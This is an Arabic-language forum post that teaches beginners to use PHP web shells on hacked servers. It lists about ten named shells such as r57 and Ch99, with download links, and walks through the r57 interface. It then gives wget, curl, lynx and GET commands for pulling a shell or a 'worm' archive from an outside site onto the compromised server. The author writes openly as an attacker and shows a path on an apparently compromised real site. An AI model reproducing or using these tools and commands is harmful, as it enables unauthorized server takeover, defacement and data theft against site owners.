|
 مساحة اعلانات نصية ذهبية |
||
| اعلن هنا | اعلن هنا | اعلن هنا |
|
|||||||
 |
|
|
أدوات الموضوع | انواع عرض الموضوع |
|
#1
04-26-2012, 12:40 AM
|
|||
|
|||
ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ تعالوا نشوف
السلام عليكم اخواني اول موضوع لية في المنتدي ارجو ان ينال اعجابكم :38: نبدا بسم الله الرحمن الرحيم
في البداية اكثر الاعضاء يسألون ماهو الشل؟؟؟ وماهي استخداماته؟؟؟ وماهي اوامره؟؟؟ الخ نبدأ على بركة الله ماهو الشل؟؟؟؟ وهو عبارة عن سكربت مكتوب بلغة php****************l ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل. والان ما الفائدة منه؟؟ لان الكل يسمع عن الشل وما يعرف شنو استخداماته؟؟ وانا اقولك له استخدامات كثيرة فنحن الهكرز نستخدمه في السيطرة على السيرفرات والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها وهذا حسب صلاحياتك على السيرفر واكيد راح تقولي شنو صلاحياتي ؟؟ وانا اقولك الصلاحيات يعني شنو انت على السيرفر اي شنو موقعك من الاعراب هههههههههه واليكم انواع الصلاحيات على السيرفر 1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا 2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت 3- nobody, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعلة شل فقط ولكن في سؤال مهم وهي اكيد انت راح تقولي كيف اعرف صلاحياتي على السيرفر؟؟؟ وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس درسنا ممل اليوم ههههههههههه اتحملوني شباب انا اخوكم معلش ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو كيف ارفع الشل على موقع؟؟؟ وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول وش هي الثغرة؟؟؟؟ وانا اجاوبك مع انك مللتني من كثر اسالتك ههههههههههه الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ..... والان الحمد لله عرفتوا شنو الثغرة ولنفترض انك تمكنت من رفع شل على موقع ولكن اكيد انت تبي تعرف انواع الشل؟؟ وانا اقولك تامر امر هذي بعض الانواع: 1- ************admin هذا الشل جيل ومفيد للمبتدئين لانه يسمحلك برفع الملفات وحذف الملفات وانشاء مجلد بكل سهولة ولتطبيق امر معين مثلا على ملف كل ما عليك هو انك تضغط على المكان الفارغ امام الملف المراد التعديل عليه واختار الي تبي تعديل حذف او غيره كذلك تستطيع حذف مجلد كامل فهو لا يحتاج الى اوامر لينكس. http://www.i-saudi.com/lezr.com/************admin.zip 2- My****************l هذا الشل جميل ولكن قديم وهو يعتمد على اوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه ورابط التحميل للشل http://www.i-saudi.com/lezr.com/My****************l-1.0.6.zip 3- phpRemoteView شل جميل ومشابه لخصائص الشل ************admin وكل مجلد تود التعديل عليه استخدم الاسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.http://www.i-saudi.com/lezr.com/phpRemoteView.zip 4- php****************l-1.7 شل جميل وشبيه بالشل My****************l مفيد للمبتدئين http://www.i-saudi.com/lezr.com/php****************l-1.7.zip 5- phpFileManager شل سهل جدا واوامره واضحة ولا يحتاج الى شرح http://www.i-saudi.com/lezr.com/phpF...ager-0.9.3.zip 6- r57****************l الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله واما الاصدار الجديد منه (موجود في المنتدى اصداره الجديد منزله الاخ متكي ورا الشمس) فقد اضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك ولكن سوف اشرح لكم هذا الشل في نهاية درسنا الممل هههههههههه 7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به http://www.i-saudi.com/lezr.com/phplab.zip 8- haexplorer شل ايضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه http://www.i-saudi.com/lezr.com/haexplorer.zip 9- php exploit lab شل ايضا جميل ولكن ايضا لا انصح المبتدئين به http://www.i-saudi.com/lezr.com/explorer.zip 10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي انك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك بتطبيق اوامر لينكس بالاضافة الى امكانية تصفح الملفات من خلاله كما في الشل ************admin ولكن باختيارات اوسع والان الحمد لله الكل عرف الشل وانواعه واستخدامه ولكن في سؤالين محد سألهم وهي اني من خلال الشرح تكلمت عن شغلتين وهي التصاريح؟؟؟ودوال سحب الملفات؟؟؟ والجواب للسؤال الاول موجود في منتدى العاصفة موضوع لي في مملكة امن المواقع والشبكات قسم المبتدئين اسمه(شرح خرافي لاوامر لينكس+التصاريح بالتفصيل)الموضوع مثبت وبقي شي واحد وهو دوال السحب وسوف اشرحها بالتفصيل في درسنا لليوم لاحقا في وقتها. وشباب اكيد مليتوا وانا انصحكم روحوا شربوا فنجان قهوة وارجعوا ههههههههههه نكمل والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسي r57 الي انا افضله بين الشلات الباقية اليكم شرحه بالصور: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ والان اليكم الشرح حسب الترقيم في الصورة: 1- phpinfo هنا لمشاهدة البرامج المثبته على السيرفر وسوف اشرحها في درس اخر 2- السيف مود اوف والسيف مود هو حالة امنة يتم تفعيلها على السيرفر لمنع تطبيق الدوال. 3- اصدار الينكس للسيرفر المخترق مع اخر تحديث له وهو 2005 4- id وهو كما ذكرت صلاحياتك على السيرفر وهي نوبدي 5- pwd مسارك على السيرفر اي مكان تواجدك 6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح الشل شوفو الصورة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ - هنا تكتب امر اللينكس مثلا id لمعرفة صلاحياتك 2- هنا المسار الذي انت عليه او اكتب pwd لمعرفة مسارك 3- هنا للتنفيذ اي عند كتابة امر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الامر واضغط انتر) والان اشرح لكم دوال سحب الملفات والان اليكم الشرح وسوف اشرح على الدالة wget في البداية كشرح خفيف لمعرفة ان الدالة wget شغالة يجب كتابة الامر which wget وشوفوا الصورة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ وكما تلاحظون كتبنا الامر which wget في مربع تنفيذ الاوامر ونضغط انتر وشوفو النتيجة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ والان كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي ان الدالة شغالة والان نكتب امر السحب ولكن قبل كل ذلك يجب ان تتأكد من ان المجلد الذي سوف تسحب الشل له يملك التصريح 777 شوفوا الصورة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ كما تلاحظون الاختيارات: 1- هذا هو التصريح 777 الذي يجب ان يكون بدون شرطات كما في الصورة 2- هذا الاختيار هو المجلد الذي سوف نسحب له الملف الذي نريد والان كل شي جاهز المجلد ذو التصريح والملف الذي سوف نسحبه وانا هنا سوف اسحب الشل ch99 للتوضيح لا اكثر ويمكن انت بهذه الطريقة ان تسحب الاندكس الخاصة بالاختراق او اي شي اخر والان اكتب في مكان تنفيذ الاوامر wget http://www.site.com/****************l.zip والشرح للايعاز wget دالتنا التي سوف نسحب بها الملف والموقع الذي بجنبها رفعنا له الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الايعاز لن يظهر لك اي رد والان نحن رفعناه مضغوط فيجب فك ضغطه بالايعاز unzip ****************l.zip والرد سوف يظهر في الصورة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ كما تلاحظون الرد المحاط بالاحمر يدل على نجاح العملية والان ماذا لو لم تعمل هذه الدالة؟؟ اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي lynx -source www.site.com/worm.zip > worm.zip والاداة curl استخدامها كالتالي curl -o worm.zip www.site.com/worm.zip واخيرا الدالة get استخدامها كالتالي GET www.site.com/worm.zip > worm.zip وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط له واذا اردتم معلومات اكثر عن رفع الشل شوفوا موضوعي في قسم المواضيع المتميزة لرفع الشل والان نكمل شرح الشل الروسي لنفترض انك عندك ملف وتبي ترفعة للسيرفر والملف على جهازك وش تسوي؟؟ اقولك ولا يهمك انزل بالشل للاسفل وشوف الاختيار هذا بالصورة: ماهو الشل؟؟ماهي استخداماته؟؟؟ اوامره؟؟؟ انواعه؟؟؟ الاختيار 1- هنا لاختيار الملف من جهازك ومعناه استعراض brouse 2- هذا الاختيار معناه رفع اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والان شرح خفيف عن المسار الذي نحن فيه؟؟ /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي واكيد را تقولي شلون عرفت؟؟ وانا اقولك المجلد الرئيسي اما انه يكون public_html او يكون على اسم الموقع كما في مسارنا او يكون www والي اخره حسب السيرفر والحين عرفتوا احنا ليش مو على المجلد الرئيسي ولكن اكيد راح تقولي ابي اصير على المجلد الرئيسي وانا اقول تامر امر احذف المجلد html واكتب الايعاز التالي cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/ مثل ما شفتوا حذفنا المجلد html وكتبنا الايعاز cd وهو يستخدم للدخول الى مجلد معين وتغيير المسار لا تنسو التقيم :33: السلام ختام 
|
|
|
|
|||||||||
| pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore | pakgestore |
| تشليح الرياض | مساحة إعلانيه | ||||||||
|
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| فى بريطانيا كل العجب ، تعالوا نشوف كيف يعامل الكلب المدلل ! | eshrag | اشراق شامل - منوعات | 0 | 05-01-2013 02:10 AM |
| تعالوا نشوف صور نجوم أتراك وهم فى مرحلة الطفولة | eshrag | اشراق شامل - منوعات | 0 | 02-07-2013 02:42 AM |
| تعالوا نشوف هذا الحدث بعد 100 سنة من الانتظار | eshrag | اشراق شامل - منوعات | 0 | 08-24-2012 04:30 PM |
| تعالوا نشوف منزل هايدي الحقيقي | اسيرة الصمت | المنتدى العام - مواضيع عامة | 3 | 10-03-2009 11:11 AM |
| اتنين نسوان التقوا بالسما تعالوا نشوف شو صار بينهم | بلبل الشرق- | المنتدى العام - مواضيع عامة | 2 | 03-25-2008 06:25 PM |
|
روابط نصية AAWA |
||||
| yalla live | يلا لايف | سوريا لايف | يلا شوت | yalla live |
|
شراء روابط نصية |
|
| راسلنا الآن لشراء روابط نصية باك لينك وجيست بوست | خدمات الباك لينك والروابط النصية |
|
روابط نصية AAXA |
| عسل النحل |
|
روابط نصية AA1A |
|||||
| كورة لايف | koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | كورة لايف |
| koora live | مباريات اليوم بث مباشر | kora 360 | koora4live | kooralive | مساحة إعلانيه |
|
روابط نصية2 M4U |
||||
| متجر كي ستور | شدات ببجي اقساط | بطاقات قوقل بلاي | بطاقات ايتونز | اكواد شدات ببجي |
|
روابط نصية AAZ |
||
| متجر الرياض | شدات ببجي | شحن شدات ببجي |
|
روابط نصية KSM |
|||||||
| خصومات | مساحة إعلانيه | ||||||
|
روابط نصية AN |
||||
| يلا شوت | يلا شوت | يلا لايف | yalla shoot | يلا شوت |
|
روابط نصية M11 |
|||||||
| كورة جول | يلا لايف | دوت سبورت | bein match | yalla shoot | yalla shoot | koora live | koora live |
| يلا شوت | koora4live | سوريا لايف | تابع لايف | كورة لايف | كورة جول | كورة لايف | koora live |
|
روابط نصية AWA |
||||
| كورة لايف | Koora live | يلا شوت | Yalla shoot | يلا شوت |
|
روابط نصية AA3A |
||||
| تقييم شركة exness | تقييم شركة binance | تقييم شركة avatrade | تقييم شركة evest | افضل شركات التداول |
|
روابط نصية S22 |
||||
| تشليح السيارات بالرياض | شراء سيارات تشليح بالرياض | تشليح | تشليح الحاير | تشليح السلى |
| موقع شراء سيارات تشليح | شراء سيارات تشليح | تشليح السيارات | قطع غيار تشليح | تشاليح |
|
روابط نصية AA25 |
||
| عبادي الخليج | شدات ببجي | شدات ببجي تمارا |
|
روابط نصية AA44 |
|||||
| كيفية شراء سهم امازون | كيفية شراء سهم ارامكو | كيفية شراء سهم لوسيد | كيفية الاستثمار في الذهب | تقييم شركة evest | تعلم تداول الاسهم |
|
روابط نصية AA45 |
||||
| koora live | koora live | يلا شوت | yalla shoot | koora live |
|
روابط نصية AA46 |
|||||
| زيادة متابعين تيك توك | زيادة لايكات تيك توك | زيادة متابعين انستقرام | زيادة مشاهدات تيك توك | زيادة متابعين تويتر | زيادة متابعين |
|
روابط نصية AA47 |
||||
| سطحة شمال الرياض | سطحة بين المدن | سطحه شرق الرياض | شحن السيارات | سطحة هيدروليك |
| سطحة هيدروليك | نقل السيارات بين المدن | ارخص شركة شحن بين المدن | شركة شحن سيارات | شراء سيارات تشليح |
|
روابط نصية AA51 |
|||||
| kooora live | كورة لايف | yalla shoot | يلا شوت | koora live | kooora live |
| كورة لايف | koora live | kooora live | yalla live | يلا لايف | koora live |
|
روابط نصية AA59 |
|||||
| ضوء التعليم | دروس الرياضيات | المعاني | قدرات وتحصيلي | ملخصات | مساحة إعلانيه |
العرض العادي
